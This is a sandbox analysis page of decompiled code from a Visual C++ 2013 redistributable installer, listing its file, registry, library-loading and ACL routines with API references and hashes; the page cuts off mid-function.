Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: a06a0de4b9c03d087809f68537c9d2faa4f44773173d03bebcedf6956588c74b
Instruction ID: 012e391bccc6e400198bfcae8d1dbed6ff2cba09f510f2ba0c0ddc9e00cc6255
Opcode Fuzzy Hash: a06a0de4b9c03d087809f68537c9d2faa4f44773173d03bebcedf6956588c74b
Instruction Fuzzy Hash: B401D1326A0212BBE73125B9EC8DFBA39889B15BF0F108125FB14FF1D0C6B9991043E0

Uniqueness

Uniqueness Score: -1.00%

Function 012A5E49 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E012A5E49(void* __eflags, void* _a4, intOrPtr _a8) {
				void* _t8;
				int _t11;
				signed int _t13;
				signed int _t19;
				void* _t20;

				_t19 = 0x80070490;
				_t20 = E012A5A83(_t8, _a4);
				if(_t20 != 0) {
					_push(0);
					_t11 = SetFilePointerEx(_a4,  *(_t20 + 8),  *(_t20 + 0xc), 0); // executed
					if(_t11 != 0) {
						 *(_t20 + 8) =  *(_t20 + 8) + _a8;
						asm("adc dword [esi+0xc], 0x0");
						_t19 = 0;
					} else {
						_t13 = GetLastError();
						if(_t13 > 0) {
							_t13 = _t13 & 0x0000ffff | 0x80070000;
						}
						_t19 = _t13;
						if(_t19 >= 0) {
							_t19 = 0x80004005;
						}
						E012B294E(_t13, "cabextract.cpp", 0x35d, _t19);
						_push("Failed to move to virtual file pointer.");
						_push(_t19);
						E012AFA86();
					}
				}
				return _t19;
			}

0x012a5e51
0x012a5e5b
0x012a5e5f
0x012a5e61
0x012a5e6e
0x012a5e76
0x012a5eb9
0x012a5ebc
0x012a5ec0
0x012a5e78
0x012a5e78
0x012a5e80
0x012a5e87
0x012a5e87
0x012a5e8c
0x012a5e90
0x012a5e92
0x012a5e92
0x012a5ea2
0x012a5ea7
0x012a5eac
0x012a5ead
0x012a5eb3
0x012a5e76
0x012a5ec7

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,00000000,?,?,012A5F51,?,?), ref: 012A5E6E
GetLastError.KERNEL32(?,012A5F51,?,?), ref: 012A5E78

Strings

cabextract.cpp, xrefs: 012A5E9D
Failed to move to virtual file pointer., xrefs: 012A5EA7

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 5118c55c5f55f8f0366430f26cad34cb726a67ab14e88ad8c1533347c38543e1
Instruction ID: 5966688e1224354d8877ada5b27cf563c7aa9b9fea2c5e8c6035675fb810fa89
Opcode Fuzzy Hash: 5118c55c5f55f8f0366430f26cad34cb726a67ab14e88ad8c1533347c38543e1
Instruction Fuzzy Hash: 8401D632360707ABD3312A56DD05F5B7B959F80B71F55C02DF758DA150DAB9E40087D4

Uniqueness

Uniqueness Score: -1.00%

Function 012B2A2D Relevance: 6.1, APIs: 4, Instructions: 68
libraryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E012B2A2D(intOrPtr _a4, struct HINSTANCE__** _a8) {
				signed int _v8;
				short _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				signed int _t18;
				signed int _t19;
				signed int _t24;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__** _t29;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t13 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t13 ^ _t36;
				_t29 = _a8;
				E012A7E30( &_v528, 0, 0x208);
				_t18 = GetSystemDirectoryW( &_v528, 0x104);
				if(_t18 == 0) {
					L5:
					_t19 = GetLastError();
					if(_t19 > 0) {
						_t19 = _t19 & 0x0000ffff | 0x80070000;
					}
					_t34 = _t19;
					if(_t19 >= 0) {
						_t34 = 0x80004005;
					}
					L9:
					return E012A7EAA(_t34, _t29, _v8 ^ _t36, _t33, _t34, 0x104);
				}
				_t32 = 0x5c;
				_t40 = _t32 -  *((intOrPtr*)(_t36 + _t18 * 2 - 0x20e));
				if(_t32 ==  *((intOrPtr*)(_t36 + _t18 * 2 - 0x20e))) {
					L3:
					_t24 = E012B29A5(_t41,  &_v528, 0x104, _a4);
					_t34 = _t24;
					if(_t24 < 0) {
						goto L9;
					}
					_t26 = LoadLibraryW( &_v528); // executed
					 *_t29 = _t26;
					if(_t26 != 0) {
						goto L9;
					}
					goto L5;
				}
				_t34 = E012B29E2(_t40,  &_v528, 0x104, "\\", 1);
				_t41 = _t34;
				if(_t34 < 0) {
					goto L9;
				}
				goto L3;
			}

0x012b2a36
0x012b2a3d
0x012b2a41
0x012b2a54
0x012b2a69
0x012b2a71
0x012b2ac3
0x012b2ac3
0x012b2acb
0x012b2ad2
0x012b2ad2
0x012b2ad7
0x012b2adb
0x012b2add
0x012b2add
0x012b2ae2
0x012b2af2
0x012b2af2
0x012b2a75
0x012b2a76
0x012b2a7e
0x012b2a9a
0x012b2aa5
0x012b2aaa
0x012b2aae
0x00000000
0x00000000
0x012b2ab7
0x012b2abd
0x012b2ac1
0x00000000
0x00000000
0x00000000
0x012b2ac1
0x012b2a94
0x012b2a96
0x012b2a98
0x00000000
0x00000000
0x00000000

APIs

_memset.LIBCMT ref: 012B2A54
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 012B2A69
LoadLibraryW.KERNELBASE(?,?,00000104,01281C3B), ref: 012B2AB7
GetLastError.KERNEL32 ref: 012B2AC3

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem_memset
String ID:
API String ID: 1376650706-0
Opcode ID: b6d5b2eb361bd49116b37f9a7950d0a820dfab38f89a15e7ca10a2aa1efb7028
Instruction ID: 554105e6a394d893406b46955d964e0b3b8c816baf4f57844a6c25876122dab7
Opcode Fuzzy Hash: b6d5b2eb361bd49116b37f9a7950d0a820dfab38f89a15e7ca10a2aa1efb7028
Instruction Fuzzy Hash: 4E11E9B6A2031AA7DB30AB65DC89FDB7BADAF94790F300074E718D7141EA35E9448B50

Uniqueness

Uniqueness Score: -1.00%

Function 01281033 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E01281033(struct _CRITICAL_SECTION* __eax, void* __ecx, union _LARGE_INTEGER* __edx, void* __eflags) {
				signed int _v8;
				void* _t25;
				union _LARGE_INTEGER* _t33;
				struct _CRITICAL_SECTION* _t38;
				void* _t40;

				_t33 = __edx;
				_t30 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t38 = __eax;
				 *(__eax + 0x48c) =  *(__eax + 0x48c) | 0xffffffff;
				 *((intOrPtr*)(__eax + 0x484)) = 1;
				InitializeCriticalSection(__eax);
				InitializeCriticalSection(_t38 + 0xd0);
				E01282855(_t38 + 0x494);
				E01282855(_t38 + 0x4ac);
				E012AFE13(GetCurrentProcess(),  &_v8); // executed
				asm("sbb eax, eax");
				 *(_t38 + 0x488) =  ~_v8 & 0x00000002;
				if(_v8 == 0 || E012AFDAD(_t30, _t33, 0) == 0) {
					_t25 = E0128209F(_t33, _t38 + 0x48); // executed
					_t40 = _t25;
					if(_t40 < 0) {
						_push("Failed to initialize engine section.");
						_push(_t40);
						goto L5;
					}
				} else {
					_push("Failed to verify elevation state.");
					_t40 = 0x80070005;
					_push(0x80070005);
					L5:
					E012AFA86();
				}
				return _t40;
			}

0x01281033
0x01281033
0x01281036
0x01281037
0x0128103c
0x0128103e
0x0128104d
0x01281057
0x01281060
0x01281069
0x01281075
0x01281085
0x0128108f
0x01281098
0x0128109e
0x012810be
0x012810c3
0x012810c7
0x012810c9
0x012810ce
0x00000000
0x012810ce
0x012810ab
0x012810b0
0x012810b5
0x012810b7
0x012810cf
0x012810cf
0x012810d5
0x012810db

APIs

InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 01281057
InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 01281060

Part of subcall function 012AFE13: OpenProcessToken.ADVAPI32(?,00000008,00000000,773D9EB0,?,00000000), ref: 012AFE35
Part of subcall function 012AFE13: GetLastError.KERNEL32 ref: 012AFE3F
Part of subcall function 012AFE13: FindCloseChangeNotification.KERNELBASE(00000000), ref: 012AFECB

Part of subcall function 012AFDAD: _memset.LIBCMT ref: 012AFDD5

Strings

Failed to verify elevation state., xrefs: 012810B0
Failed to initialize engine section., xrefs: 012810C9

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalInitializeSection$ChangeCloseErrorFindLastNotificationOpenProcessToken_memset
String ID: Failed to initialize engine section.$Failed to verify elevation state.
API String ID: 1157272915-3203524654
Opcode ID: 8a464c225f628750f197848f9099400b4a494e889c51aaa4a92502af2312ced0
Instruction ID: 6c9b79a34e6427cc0295823923b8280d9e03d74360431a86dc3252ce407a13ac
Opcode Fuzzy Hash: 8a464c225f628750f197848f9099400b4a494e889c51aaa4a92502af2312ced0
Instruction Fuzzy Hash: FE11E5B2A61716ABDB20B7B8DD05BDF73DC9F10350F000619FA16E32C0EA78A90187A4

Uniqueness

Uniqueness Score: -1.00%

Function 012B31D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E012B31D0(void* __ebx, void* __edi, void* __esi, void* _a4, short* _a8, long _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int _t45;
				long _t46;
				long _t53;
				long _t56;
				long _t63;
				long _t67;
				signed int _t72;
				void* _t78;
				char** _t82;

				_t78 = __edi;
				_t82 = _a12;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_t82 == 0) {
					L4:
					_t45 = 2;
					_v8 = _t45;
					_t46 = E012B00D8(_t82, _t45);
					_a12 = _t46;
					if(_t46 < 0) {
						L26:
						if(_v20 != 0) {
							E012B01E8(_v20);
						}
						return _a12;
					}
					L5:
					_v16 = _v8 + _v8 - 2;
					_t53 = RegQueryValueExW(_a4, _a8, 0,  &_v12,  *_t82,  &_v16); // executed
					if(_t53 != 0xea) {
						L8:
						_push(_t78);
						_t72 = _t53;
						if(_t53 > 0) {
							_t72 = _t72 & 0x0000ffff | 0x80070000;
						}
						if(_t72 != 0x80070002) {
							__eflags = _t53;
							if(__eflags == 0) {
								__eflags = _v12 - 1;
								if(_v12 == 1) {
									L22:
									_t77 = _v8;
									( *_t82)[_v8 * 2 - 2] = 0;
									__eflags = _v12 - 2;
									if(_v12 == 2) {
										_t56 = E012B1171(0, _t77,  &_v20,  *_t82, 0);
										_a12 = _t56;
										__eflags = _t56;
										if(_t56 >= 0) {
											_a12 = E012B1B10(0, _t77, _t82, _v20, 1);
										}
									}
									goto L25;
								}
								__eflags = _v12 - 2;
								if(_v12 == 2) {
									goto L22;
								}
								_t53 = 0x8007070c;
								_push(0x8007070c);
								_a12 = 0x8007070c;
								_push(0x1e1);
								L21:
								_push("regutil.cpp");
								E012B294E(_t53);
								goto L25;
							}
							if(__eflags > 0) {
								_t53 = _t53 & 0x0000ffff | 0x80070000;
								__eflags = _t53;
							}
							_a12 = _t53;
							__eflags = _t53;
							if(_t53 >= 0) {
								_a12 = 0x80004005;
							}
							_push(_a12);
							_push(0x1ce);
							goto L21;
						} else {
							_a12 = 0x80070002;
							L25:
							goto L26;
						}
					}
					_v8 = (_v16 >> 1) + 1;
					_t63 = E012B00D8(_t82, (_v16 >> 1) + 1);
					_a12 = _t63;
					if(_t63 < 0) {
						goto L26;
					} else {
						_t53 = RegQueryValueExW(_a4, _a8, 0,  &_v12,  *_t82,  &_v16); // executed
						goto L8;
					}
				}
				_t66 =  *_t82;
				if( *_t82 == 0) {
					goto L4;
				}
				_t67 = E012B018E(_t66,  &_v8);
				_a12 = _t67;
				if(_t67 < 0) {
					goto L26;
				}
				if(_v8 >= 2) {
					goto L5;
				}
				goto L4;
			}

0x012b31d0
0x012b31da
0x012b31dd
0x012b31e0
0x012b31e3
0x012b31e6
0x012b31eb
0x012b320e
0x012b3210
0x012b3213
0x012b3216
0x012b321b
0x012b3220
0x012b331f
0x012b3325
0x012b332a
0x012b332a
0x012b3333
0x012b3333
0x012b3226
0x012b322d
0x012b3241
0x012b324c
0x012b3280
0x012b3280
0x012b328b
0x012b328f
0x012b3293
0x012b3293
0x012b329c
0x012b32a3
0x012b32a5
0x012b32c5
0x012b32c9
0x012b32eb
0x012b32ed
0x012b32f2
0x012b32f7
0x012b32fb
0x012b3304
0x012b3309
0x012b330c
0x012b330e
0x012b331b
0x012b331b
0x012b330e
0x00000000
0x012b32fb
0x012b32cb
0x012b32cf
0x00000000
0x00000000
0x012b32d1
0x012b32d6
0x012b32d7
0x012b32da
0x012b32df
0x012b32df
0x012b32e4
0x00000000
0x012b32e4
0x012b32a7
0x012b32ab
0x012b32ab
0x012b32ab
0x012b32ad
0x012b32b0
0x012b32b2
0x012b32b4
0x012b32b4
0x012b32bb
0x012b32be
0x00000000
0x012b329e
0x012b329e
0x012b331e
0x00000000
0x012b331e
0x012b329c
0x012b3256
0x012b3259
0x012b325e
0x012b3263
0x00000000
0x012b3269
0x012b327a
0x00000000
0x012b327a
0x012b3263
0x012b31ed
0x012b31f1
0x00000000
0x00000000
0x012b31f8
0x012b31fd
0x012b3202
0x00000000
0x00000000
0x012b320c
0x00000000
0x00000000
0x00000000

APIs

RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,01291F19,00000000,01291F19,00000002,00000009,00000000,01291F19,00000000,?,?,?), ref: 012B3241
RegQueryValueExW.KERNELBASE(?,01291F19,00000000,?,01291F19,?,01291F19,?), ref: 012B327A

Strings

regutil.cpp, xrefs: 012B32DF

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 0225f2888cc7b86c1d1193a2dfdb1a59f1d10bfa69dfe9f6c854dd40af231dd5
Instruction ID: d8f6b20795ad0580d5c98bf99f0f723721f622e5e10b5770474f43da9b9012b9
Opcode Fuzzy Hash: 0225f2888cc7b86c1d1193a2dfdb1a59f1d10bfa69dfe9f6c854dd40af231dd5
Instruction Fuzzy Hash: D941EC71A2024AAFDF11DF98CCC59FEBBB9FF04380F14496AEA11E6250D7719A54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B84E7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E012B84E7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t44;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;

				_t55 = __edx;
				_t54 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_t53 = E012B8123(__ecx, __edx, _a8,  &_v20);
				if(_t53 >= 0) {
					_t44 = E012B371B(_a4, _v20, 0x20006, 0, 0,  &_v12,  &_v24); // executed
					_t53 = _t44;
					if(_t53 >= 0) {
						_push(_a12);
						_t53 = E012B177A( &_v16, L"%ls\\%ls",  *0x12d4f5c);
						if(_t53 >= 0) {
							_t49 = E012B371B(_v12, _v16, 0x20006, 0, 0,  &_v8,  &_v24); // executed
							_t53 = _t49;
							if(_t53 >= 0) {
								_t50 = E012B3B02(_t54, __edx, _v8,  *0x12d4f4c, _a16); // executed
								_t53 = _t50;
								if(_t53 >= 0) {
									_t51 = E012B3B02(_t54, _t55, _v8,  *0x12d4f50, _a20); // executed
									_t53 = _t51;
									if(_t53 >= 0 && _a24 != 0) {
										_t53 = E012B362A(_v8,  *0x12d4f54, _a24);
									}
								}
							}
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8); // executed
					_v8 = 0;
				}
				if(_v16 != 0) {
					E012B01E8(_v16);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
					_v12 = 0;
				}
				if(_v20 != 0) {
					E012B01E8(_v20);
				}
				return _t53;
			}

0x012b84e7
0x012b84e7
0x012b84f9
0x012b84fc
0x012b84ff
0x012b8502
0x012b8505
0x012b850d
0x012b8511
0x012b852d
0x012b8532
0x012b8536
0x012b853c
0x012b8553
0x012b855a
0x012b856d
0x012b8572
0x012b8576
0x012b8584
0x012b8589
0x012b858d
0x012b859b
0x012b85a0
0x012b85a4
0x012b85bc
0x012b85bc
0x012b85a4
0x012b858d
0x012b8576
0x012b855a
0x012b8536
0x012b85c7
0x012b85cc
0x012b85ce
0x012b85ce
0x012b85d4
0x012b85d9
0x012b85d9
0x012b85e1
0x012b85e6
0x012b85e8
0x012b85e8
0x012b85ee
0x012b85f3
0x012b85f3
0x012b85fe

APIs

Part of subcall function 012B8123: lstrlenW.KERNEL32(?,?,?,012B8243,?,?,?,00000000,?,?,?,0129F535,?,?,?,00000000), ref: 012B8146

RegCloseKey.KERNELBASE(00000000,012813BB,?,?,012813BB,00000000,00000000,?,012813BB,00000001,00000000), ref: 012B85CC
RegCloseKey.ADVAPI32(00000001,012813BB,?,?,012813BB,00000000,00000000,?,012813BB,00000001,00000000), ref: 012B85E6

Part of subcall function 012B371B: RegCreateKeyExW.KERNELBASE(00000001,00000000,00000000,00000000,00000000,00000001,012813BB,?,?,00000001,?,01287275,?,012813BB,00020006,00000001), ref: 012B373F

Part of subcall function 012B3B02: RegSetValueExW.KERNELBASE(00020006,?,00000000,00000001,?,00000000,?,000000FF,00000000,00000001,?,?,0128698C,00000000,?,00020006), ref: 012B3B35

Part of subcall function 012B3B02: RegDeleteValueW.KERNELBASE(00020006,?,00000001,?,?,0128698C,00000000,?,00020006,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 012B3B64

Part of subcall function 012B362A: RegSetValueExW.KERNELBASE(?,00020006,00000000,00000004,012868E2,00000004,00000001,?,012868E2,00020006,Resume,012813BB,00000000,00000000,?,?), ref: 012B363F

Strings

%ls\%ls, xrefs: 012B8548

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: 1fc5c486248b158c10ba2a52dd43d6f054d5913088d7e37022e61ffb0fef4df9
Instruction ID: 1b54494639ee1f0e703abf469d356053e433eca7cb6256f1c8936e1fce41176d
Opcode Fuzzy Hash: 1fc5c486248b158c10ba2a52dd43d6f054d5913088d7e37022e61ffb0fef4df9
Instruction Fuzzy Hash: F1311971D1112EBBCF12AFD4ECC48EEBF7AFB18B80B114462F614A2124D7714B51AB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B3B02 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E012B3B02(void* __ecx, void* __edx, void* _a4, short* _a8, char* _a12) {
				signed int _v8;
				signed int _t12;
				signed int _t22;
				signed int _t26;

				_t22 = 0;
				_v8 = _v8 & 0;
				if(_a12 == 0) {
					_t12 = RegDeleteValueW(_a4, _a8); // executed
					__eflags = _t12 - 2;
					if(_t12 == 2) {
						L10:
						_t12 = 0;
						__eflags = 0;
					} else {
						__eflags = _t12 - 3;
						if(_t12 == 3) {
							goto L10;
						}
					}
					__eflags = _t12;
					if(__eflags != 0) {
						if(__eflags > 0) {
							_t12 = _t12 & 0x0000ffff | 0x80070000;
							__eflags = _t12;
						}
						_t22 = _t12;
						__eflags = _t22;
						if(_t22 >= 0) {
							_t22 = 0x80004005;
						}
						_push(_t22);
						_push(0x2f0);
						goto L17;
					}
				} else {
					_t22 = E012B390E(_a12, 0xffffffff,  &_v8);
					if(_t22 >= 0) {
						_t12 = RegSetValueExW(_a4, _a8, 0, 1, _a12, _v8); // executed
						_t26 = _t12;
						if(_t26 != 0) {
							if(_t26 > 0) {
								_t12 = _t12 & 0x0000ffff | 0x80070000;
							}
							_t22 = _t12;
							if(_t22 >= 0) {
								_t22 = 0x80004005;
							}
							_push(_t22);
							_push(0x2e7);
							L17:
							_push("regutil.cpp");
							E012B294E(_t12);
						}
					}
				}
				return _t22;
			}

0x012b3b07
0x012b3b09
0x012b3b0f
0x012b3b64
0x012b3b6a
0x012b3b6d
0x012b3b74
0x012b3b74
0x012b3b74
0x012b3b6f
0x012b3b6f
0x012b3b72
0x00000000
0x00000000
0x012b3b72
0x012b3b76
0x012b3b78
0x012b3b7a
0x012b3b81
0x012b3b81
0x012b3b81
0x012b3b86
0x012b3b88
0x012b3b8a
0x012b3b8c
0x012b3b8c
0x012b3b91
0x012b3b92
0x00000000
0x012b3b92
0x012b3b11
0x012b3b1f
0x012b3b23
0x012b3b35
0x012b3b3b
0x012b3b3d
0x012b3b3f
0x012b3b46
0x012b3b46
0x012b3b4b
0x012b3b4f
0x012b3b51
0x012b3b51
0x012b3b56
0x012b3b57
0x012b3b97
0x012b3b97
0x012b3b9c
0x012b3b9c
0x012b3b3d
0x012b3b23
0x012b3ba5

APIs

RegSetValueExW.KERNELBASE(00020006,?,00000000,00000001,?,00000000,?,000000FF,00000000,00000001,?,?,0128698C,00000000,?,00020006), ref: 012B3B35
RegDeleteValueW.KERNELBASE(00020006,?,00000001,?,?,0128698C,00000000,?,00020006,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 012B3B64

Strings

regutil.cpp, xrefs: 012B3B97

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: 452ef24a04a91d1430b375802b6fb1c452bc41b4c49fe029fb913a07f36585ae
Instruction ID: 09dcada50deb0194382b6a765f99772d30cbf075a1f437e04d86eefb439e5663
Opcode Fuzzy Hash: 452ef24a04a91d1430b375802b6fb1c452bc41b4c49fe029fb913a07f36585ae
Instruction Fuzzy Hash: C411C632971527B7DB31C958CC86BEA7E55BB007A0F154224FF10EA098E675D91097D0

Uniqueness

Uniqueness Score: -1.00%

Function 012AFA9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
sleepCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E012AFA9A(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, long _a36) {
				signed int _v8;
				signed int _t17;
				void* _t25;
				signed int _t28;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t17 = E012B1171(__ecx, __edx,  &_v8, _a4, 0);
				_t28 = _t17;
				if(_t28 < 0) {
					L10:
					if(_v8 != 0) {
						E012B01E8(_v8);
					}
					return _t28;
				}
				_t28 = 0x80004005;
				_t25 = 0;
				while(_t25 <= _a32) {
					if(_t25 != 0) {
						Sleep(_a36);
					}
					__imp__SetNamedSecurityInfoW(_v8, _a8, _a12, _a16, _a20, _a24, _a28); // executed
					if(_t17 > 0) {
						_t17 = _t17 & 0x0000ffff | 0x80070000;
					}
					_t28 = _t17;
					_t25 = _t25 + 1;
					if(_t28 < 0) {
						continue;
					} else {
						break;
					}
				}
				if(_t28 < 0) {
					E012B294E(_t17, "aclutil.cpp", 0x3a1, _t28);
				}
				goto L10;
			}

0x012afa9d
0x012afa9e
0x012afaac
0x012afab1
0x012afab5
0x012afb16
0x012afb1a
0x012afb1f
0x012afb1f
0x012afb28
0x012afb28
0x012afab8
0x012afabd
0x012afabf
0x012afac6
0x012afacb
0x012afacb
0x012afae6
0x012afaee
0x012afaf5
0x012afaf5
0x012afafa
0x012afafc
0x012afaff
0x00000000
0x00000000
0x00000000
0x00000000
0x012afaff
0x012afb04
0x012afb11
0x012afb11
0x00000000

APIs

Sleep.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,20000004,?,012978A6,00000000,00000001,20000004,?,00000000,00000000,00000000), ref: 012AFACB
SetNamedSecurityInfoW.ADVAPI32(00000000,000007D0,00000003,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,20000004,?,012978A6,00000000), ref: 012AFAE6

Strings

aclutil.cpp, xrefs: 012AFB0C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: a78ba1eaa06052b06ade882be2586ccc19f1ac3edd3bf4fa5dc859c0383e66ab
Instruction ID: 61fc4bc19ec94981f66dacc3979185f47419a63cbc1b6cbe4f5e952abbb95090
Opcode Fuzzy Hash: a78ba1eaa06052b06ade882be2586ccc19f1ac3edd3bf4fa5dc859c0383e66ab
Instruction Fuzzy Hash: 73018E3396021AFBDF224E94DD05FDE7E79AF04794F150120BB04A6120C37ACE21A794

Uniqueness

Uniqueness Score: -1.00%

Function 012B5783 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B5783(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				int _t14;
				signed int _t16;
				signed int _t21;
				void* _t24;

				_t21 = 0;
				_v8 = _v8 & 0;
				_t24 = 0;
				do {
